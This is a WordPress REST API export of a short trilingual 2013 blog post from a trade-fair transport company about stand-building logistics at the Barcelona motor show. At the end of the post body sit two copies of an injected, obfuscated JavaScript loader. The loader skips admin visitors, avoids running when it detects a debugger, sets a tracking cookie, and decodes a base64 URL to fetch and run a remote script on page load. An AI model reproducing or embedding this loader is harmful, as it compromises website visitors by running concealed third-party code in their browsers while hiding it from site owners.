{"id":753,"date":"2013-05-21T13:04:25","date_gmt":"2013-05-21T11:04:25","guid":{"rendered":"http:\/\/www.weservices.es\/?p=753"},"modified":"2026-04-27T10:20:25","modified_gmt":"2026-04-27T10:20:25","slug":"salon-internacional-del-automovil-barcelona","status":"publish","type":"post","link":"https:\/\/weservices.es\/en\/salon-internacional-del-automovil-barcelona\/","title":{"rendered":"<!--:es-->Sal\u00f3n internacional del autom\u00f3vil &#8211; Barcelona<!--:--><!--:en-->International motor show 2013 &#8211; Barcelona<!--:--><!--:ca-->Sal\u00f3 internacional del autom\u00f2bil 2013 &#8211; Barcelona<!--:-->"},"content":{"rendered":"<p><!--:es-->El sal\u00f3n m\u00e1s importante del sector del motor de Espa\u00f1a ha sido el escenario donde las grandes marcas nacionales e internacionales han expuesto sus \u00faltimas novedades. We Services hemos tenido el privilegio de asistir en la log\u00edstica de montaje de stands para los m\u00e1s importantes participantes, ampliando el mercado local.<!--:--><!--:en--><\/p>\n<p>The industry&#8217;s leading motor show in Spain was the venue where the most important national and international brands exhibited their latest news. WE Services have had the privilege of assisting in the stand building logistics for the most important participants, expanding the local market.<\/p>\n<p><!--:--><!--:ca--><\/p>\n<p>El sal\u00f3 m\u00e9s important del sector del motor a Espanya ha estat l&#8217;escenari on les grans marques nacionals i internacionals han exposat les seves \u00faltimes novetats. We Services hem tingut el privilegi d&#8217;assistir a la log\u00edstica de muntatge d&#8217;estands per als m\u00e9s importants participants, ampliant el mercat local.<\/p>\n<p><!--:--><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>El sal\u00f3n m\u00e1s importante del sector del motor de Espa\u00f1a ha sido el escenario donde las grandes marcas nacionales e internacionales han expuesto sus \u00faltimas novedades. We Services hemos tenido el privilegio de asistir en la log\u00edstica de montaje de stands para los m\u00e1s importantes participantes, ampliando el mercado local. The industry&#8217;s leading motor show [&hellip;]<\/p>","protected":false},"author":2,"featured_media":765,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Sal\u00f3n internacional del autom\u00f3vil - BarcelonaInternational motor show 2013 - BarcelonaSal\u00f3 internacional del autom\u00f2bil 2013 - Barcelona - We Services<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/weservices.es\/en\/salon-internacional-del-automovil-barcelona\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sal\u00f3n internacional del autom\u00f3vil - BarcelonaInternational motor show 2013 - BarcelonaSal\u00f3 internacional del autom\u00f2bil 2013 - Barcelona - We Services\" \/>\n<meta property=\"og:description\" content=\"El sal\u00f3n m\u00e1s importante del sector del motor de Espa\u00f1a ha sido el escenario donde las grandes marcas nacionales e internacionales han expuesto sus \u00faltimas novedades. We Services hemos tenido el privilegio de asistir en la log\u00edstica de montaje de stands para los m\u00e1s importantes participantes, ampliando el mercado local. The industry&#8217;s leading motor show [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/weservices.es\/en\/salon-internacional-del-automovil-barcelona\/\" \/>\n<meta property=\"og:site_name\" content=\"We Services\" \/>\n<meta property=\"article:published_time\" content=\"2013-05-21T11:04:25+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-27T10:20:25+00:00\" \/>\n<meta name=\"author\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/\",\"url\":\"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/\",\"name\":\"Sal\u00f3n internacional del autom\u00f3vil - BarcelonaInternational motor show 2013 - BarcelonaSal\u00f3 internacional del autom\u00f2bil 2013 - Barcelona - We Services\",\"isPartOf\":{\"@id\":\"https:\/\/weservices.es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#primaryimage\"},\"thumbnailUrl\":\"\",\"datePublished\":\"2013-05-21T11:04:25+00:00\",\"dateModified\":\"2026-04-27T10:20:25+00:00\",\"author\":{\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\"},\"breadcrumb\":{\"@id\":\"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#primaryimage\",\"url\":\"\",\"contentUrl\":\"\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/weservices.es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sal\u00f3n internacional del autom\u00f3vil &#8211; BarcelonaInternational motor show 2013 &#8211; BarcelonaSal\u00f3 internacional del autom\u00f2bil 2013 &#8211; Barcelona\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/weservices.es\/#website\",\"url\":\"https:\/\/weservices.es\/\",\"name\":\"We Services\",\"description\":\"Transport for fairs and events\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/weservices.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\",\"name\":\"JOSE ANTONIO GARCIA SANCHEZ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"caption\":\"JOSE ANTONIO GARCIA SANCHEZ\"},\"url\":\"https:\/\/weservices.es\/en\/author\/jo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sal\u00f3n internacional del autom\u00f3vil - BarcelonaInternational motor show 2013 - BarcelonaSal\u00f3 internacional del autom\u00f2bil 2013 - Barcelona - We Services","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/weservices.es\/en\/salon-internacional-del-automovil-barcelona\/","og_locale":"en_US","og_type":"article","og_title":"Sal\u00f3n internacional del autom\u00f3vil - BarcelonaInternational motor show 2013 - BarcelonaSal\u00f3 internacional del autom\u00f2bil 2013 - Barcelona - We Services","og_description":"El sal\u00f3n m\u00e1s importante del sector del motor de Espa\u00f1a ha sido el escenario donde las grandes marcas nacionales e internacionales han expuesto sus \u00faltimas novedades. We Services hemos tenido el privilegio de asistir en la log\u00edstica de montaje de stands para los m\u00e1s importantes participantes, ampliando el mercado local. The industry&#8217;s leading motor show [&hellip;]","og_url":"https:\/\/weservices.es\/en\/salon-internacional-del-automovil-barcelona\/","og_site_name":"We Services","article_published_time":"2013-05-21T11:04:25+00:00","article_modified_time":"2026-04-27T10:20:25+00:00","author":"JOSE ANTONIO GARCIA SANCHEZ","twitter_card":"summary_large_image","twitter_misc":{"Written by":"JOSE ANTONIO GARCIA SANCHEZ","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/","url":"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/","name":"Sal\u00f3n internacional del autom\u00f3vil - BarcelonaInternational motor show 2013 - BarcelonaSal\u00f3 internacional del autom\u00f2bil 2013 - Barcelona - We Services","isPartOf":{"@id":"https:\/\/weservices.es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#primaryimage"},"image":{"@id":"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#primaryimage"},"thumbnailUrl":"","datePublished":"2013-05-21T11:04:25+00:00","dateModified":"2026-04-27T10:20:25+00:00","author":{"@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b"},"breadcrumb":{"@id":"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#primaryimage","url":"","contentUrl":""},{"@type":"BreadcrumbList","@id":"https:\/\/weservices.es\/salon-internacional-del-automovil-barcelona\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/weservices.es\/"},{"@type":"ListItem","position":2,"name":"Sal\u00f3n internacional del autom\u00f3vil &#8211; BarcelonaInternational motor show 2013 &#8211; BarcelonaSal\u00f3 internacional del autom\u00f2bil 2013 &#8211; Barcelona"}]},{"@type":"WebSite","@id":"https:\/\/weservices.es\/#website","url":"https:\/\/weservices.es\/","name":"We Services","description":"Transport for fairs and events","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/weservices.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b","name":"JOSE ANTONIO GARCIA SANCHEZ","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","caption":"JOSE ANTONIO GARCIA SANCHEZ"},"url":"https:\/\/weservices.es\/en\/author\/jo\/"}]}},"_links":{"self":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/753"}],"collection":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/comments?post=753"}],"version-history":[{"count":2,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/753\/revisions"}],"predecessor-version":[{"id":3241,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/753\/revisions\/3241"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/media?parent=753"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/categories?post=753"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/tags?post=753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}